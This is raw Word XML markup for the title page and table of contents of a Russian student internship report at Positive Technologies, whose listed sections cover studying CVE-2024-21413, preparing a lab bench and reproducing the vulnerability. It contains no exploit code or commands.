    <w:p w14:paraId="32C5CF9D" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRDefault="005B61B8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 xml:space="preserve">(Ф.И.О., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>уч.степень</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, должность)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F35F76" w14:textId="77777777" w:rsidR="00CF76E2" w:rsidRPr="00FB13AA" w:rsidRDefault="00CF76E2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</w:p>
    <w:p w14:paraId="5DF37098" w14:textId="6AC374E0" w:rsidR="004B26DB" w:rsidRPr="00FB13AA" w:rsidRDefault="004B26DB" w:rsidP="004B26DB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7215"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:line="448" w:lineRule="auto"/>
        <w:ind w:right="1641" w:hanging="123"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB13AA">
        <w:t>Руководитель практической подготовки от</w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>АО «Позитив Текнолоджис»</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F336699" w14:textId="79DE811E" w:rsidR="004B26DB" w:rsidRPr="00FB13AA" w:rsidRDefault="004B26DB" w:rsidP="004B26DB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0C78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67456" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="153DA028" wp14:editId="7835D021">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>151130</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5944235" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="6506557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4D39357" id="Freeform 43" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.95pt;margin-top:11.9pt;width:468.05pt;height:0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CF76E2" w:rsidRPr="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Федоров Д</w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">митрий </w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2" w:rsidRPr="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ю</w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>рьевич</w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2" w:rsidRPr="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, руководитель направления</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F3E8FA" w14:textId="77777777" w:rsidR="004B26DB" w:rsidRPr="00FB13AA" w:rsidRDefault="004B26DB" w:rsidP="004B26DB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 xml:space="preserve">(Ф.И.О., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>уч.степень</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, должность)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A7CC27" w14:textId="46268627" w:rsidR="000E0C78" w:rsidRDefault="000E0C78" w:rsidP="000E0C78">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7215"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:line="448" w:lineRule="auto"/>
        <w:ind w:right="2737" w:hanging="123"/>
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0C78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C1F7B8F" wp14:editId="0ED40B66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>508000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5950585" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="22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0585" cy="0"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 9371"/>
                            <a:gd name="T1" fmla="*/ 0 h 20"/>
                            <a:gd name="T2" fmla="*/ 9371 w 9371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71" h="20">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="937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0548E26" id="Freeform 42" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.95pt;margin-top:40pt;width:468.55pt;height:0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7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" o:allowincell="f" path="m,l9371,e" filled="f" strokeweight=".48pt">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;5950585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E048002" wp14:editId="1DAFB494">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>508000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5950585" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2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0585" cy="0"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 9371"/>
                            <a:gd name="T1" fmla="*/ 0 h 20"/>
                            <a:gd name="T2" fmla="*/ 9371 w 9371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71" h="20">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="937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48BCD1" id="Freeform 42" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.95pt;margin-top:40pt;width:468.55pt;height:0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7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" o:allowincell="f" path="m,l9371,e" filled="f" strokeweight=".48pt">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;5950585,0" o:connectangles="0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F050F5" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="1" w:after="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5EA15F" w14:textId="6341BFCE" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81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</w:p>
    <w:p w14:paraId="25616F3D" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81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  <w:sectPr w:rsidR="002F3F81" w:rsidRPr="00FB13AA">
          <w:headerReference w:type="default" r:id="rId8"/>
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="11910" w:h="16850"/>
          <w:pgMar w:top="1060" w:right="160" w:bottom="280" w:left="1320" w:header="723" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:noEndnote/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F533B4" w14:textId="6C683FA3" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765E4F71" w14:textId="77777777" w:rsidR="00A12611" w:rsidRPr="00FB13AA" w:rsidRDefault="00A12611">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACD513D" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="005B61B8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3250"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>Оценка:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B26AA0" w14:textId="0A152ECB" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="005B61B8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:line="213" w:lineRule="exact"/>
        <w:ind w:left="259"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB13AA">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B15151" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:line="213" w:lineRule="exact"/>
        <w:ind w:left="259"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="002F3F81" w:rsidRPr="00FB13AA">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16850"/>
          <w:pgMar w:top="1040" w:right="160" w:bottom="280" w:left="1320" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="3291" w:space="734"/>
            <w:col w:w="6405"/>
          </w:cols>
          <w:noEndnote/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51897E6B" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C3C197" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="005B61B8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="382"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB13AA">
        <w:t>Руководитель практической подготовки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE674DA" w14:textId="1ED17E6B" w:rsidR="002F3F81" w:rsidRPr="0000603C" w:rsidRDefault="005B61B8" w:rsidP="0000603C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6521"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:after="9"/>
        <w:ind w:left="382"/>
      </w:pPr>
      <w:r w:rsidRPr="0000603C">
        <w:t>от ФГАОУ</w:t>
      </w:r>
      <w:r w:rsidRPr="0000603C">
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0000603C">
        <w:t>ВО «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0000603C">
        <w:t>СПбПУ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0000603C">
        <w:t>»:</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="0000603C">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:t>Жиляков Н.В.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061DB57A" w14:textId="1E36C470" w:rsidR="002F3F81" w:rsidRPr="0000603C" w:rsidRDefault="00D934DD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 w:rsidRPr="0000603C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5249F147" wp14:editId="1E96E75E">
                <wp:extent cx="5173345" cy="45085"/>
                <wp:effectExtent l="8890" t="0" r="8890" b="0"/>
                <wp:docPr id="4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3345" cy="45085"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="7528" cy="20"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="23" name="Freeform 4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528" cy="20"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 0 w 7528"/>
                              <a:gd name="T1" fmla="*/ 0 h 20"/>
                              <a:gd name="T2" fmla="*/ 7527 w 752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28" h="20">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7527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D3C569E" id="Group 48" o:spid="_x0000_s1026" style="width:407.35pt;height:3.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="75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">
                <v:shape id="Freeform 49" o:spid="_x0000_s1027" style="position:absolute;top:4;width:7528;height:20;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="752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" path="m,l7527,e" filled="f" strokeweight=".16931mm">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;7527,0" o:connectangles="0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC1059A" w14:textId="77777777" w:rsidR="004B26DB" w:rsidRPr="00FB13AA" w:rsidRDefault="004B26DB" w:rsidP="004B26DB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="382"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB13AA">
        <w:t>Руководитель практической подготовки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A00BDE3" w14:textId="69A932C9" w:rsidR="004B26DB" w:rsidRPr="0000603C" w:rsidRDefault="004B26DB" w:rsidP="004B26DB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6521"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:after="9"/>
        <w:ind w:left="382"/>
      </w:pPr>
      <w:r w:rsidRPr="0000603C">
        <w:t>от</w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2" w:rsidRPr="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>АО «Позитив Текнолоджис»</w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0000603C">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:t>Федоров Д.Ю.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1981783F" w14:textId="77777777" w:rsidR="004B26DB" w:rsidRPr="0000603C" w:rsidRDefault="004B26DB" w:rsidP="004B26DB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 w:rsidRPr="0000603C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1553B17" wp14:editId="1DC8D75F">
                <wp:extent cx="5173345" cy="45085"/>
                <wp:effectExtent l="8890" t="0" r="8890" b="0"/>
                <wp:docPr id="140866171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3345" cy="45085"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="7528" cy="20"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1372201084" name="Freeform 4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528" cy="20"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 0 w 7528"/>
                              <a:gd name="T1" fmla="*/ 0 h 20"/>
                              <a:gd name="T2" fmla="*/ 7527 w 752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28" h="20">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7527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1B3852B8" id="Group 48" o:spid="_x0000_s1026" style="width:407.35pt;height:3.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="75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">
                <v:shape id="Freeform 49" o:spid="_x0000_s1027" style="position:absolute;top:4;width:7528;height:20;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="752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" path="m,l7527,e" filled="f" strokeweight=".16931mm">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;7527,0" o:connectangles="0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EEC701" w14:textId="77777777" w:rsidR="004B26DB" w:rsidRPr="0000603C" w:rsidRDefault="004B26DB" w:rsidP="004B26DB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A56BD4" w14:textId="4005C0EF" w:rsidR="002F3F81" w:rsidRPr="0000603C" w:rsidRDefault="005B61B8" w:rsidP="0000603C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6521"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="90" w:after="8"/>
        <w:ind w:left="382"/>
      </w:pPr>
      <w:r w:rsidRPr="0000603C">
        <w:t>Обучающийся:</w:t>
      </w:r>
      <w:r w:rsidRPr="0000603C">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:t>Эков И.А.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332669B3" w14:textId="055402F3" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="00D934DD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E6DE20D" wp14:editId="2ED03A29">
                <wp:extent cx="5173345" cy="45085"/>
                <wp:effectExtent l="8890" t="2540" r="8890" b="0"/>
                <wp:docPr id="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3345" cy="45085"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="7528" cy="20"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="28" name="Freeform 53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528" cy="20"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 0 w 7528"/>
                              <a:gd name="T1" fmla="*/ 0 h 20"/>
                              <a:gd name="T2" fmla="*/ 7527 w 752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28" h="20">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7527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5E850EF" id="Group 52" o:spid="_x0000_s1026" style="width:407.35pt;height:3.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="75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">
                <v:shape id="Freeform 53" o:spid="_x0000_s1027" style="position:absolute;top:4;width:7528;height:20;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="752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" path="m,l7527,e" filled="f" strokeweight=".16931mm">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;7527,0" o:connectangles="0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="375FC83C" w14:textId="0454C29A" w:rsidR="008D7177" w:rsidRDefault="005B61B8" w:rsidP="00A12611">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3245"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="212"/>
        <w:ind w:left="259"/>
        <w:sectPr w:rsidR="008D7177">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16850"/>
          <w:pgMar w:top="1040" w:right="160" w:bottom="280" w:left="1320" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720" w:equalWidth="0">
            <w:col w:w="10430"/>
          </w:cols>
          <w:noEndnote/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>Дата:</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>07.07.2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF3BB4" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:pageBreakBefore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55D25D5A" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="af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54344B" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Цель и задачи практики</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w: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_Toc506483744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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:webHidden/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7366D89E" w14:textId="77777777" w:rsidR="0055128B" w:rsidRPr="001E4BD6" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
      <w:r w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B910828" w14:textId="0DFB0106" w:rsidR="0055128B" w:rsidRPr="001E4BD6" w:rsidRDefault="00000000" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:anchor="_Toc506483745" w:history="1">
        <w:r w:rsidR="001E4BD6">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Изучение уязвимости</w:t>
        </w:r>
        <w:r w:rsidR="001E4BD6">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:color w:val="auto"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> CVE-2024-21413</w:t>
        </w:r>
        <w:r w:rsidR="0055128B" w:rsidRPr="001E4BD6">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="0055128B" w:rsidRPr="001E4BD6">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="0055128B" w:rsidRPr="001E4BD6">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:webHidden/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15F2C086" w14:textId="42C944EB" w:rsidR="0055128B" w:rsidRPr="001E4BD6" w:rsidRDefault="00EE3A0F" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Подготовка лабораторного стенда</w:t>
      </w:r>
      <w:r w:rsidR="0055128B" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0055128B" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:webHidden/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD08DED" w14:textId="68A6F234" w:rsidR="0055128B" w:rsidRPr="001E4BD6" w:rsidRDefault="00EE3A0F" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Воспроизведение уязвимости</w:t>
      </w:r>
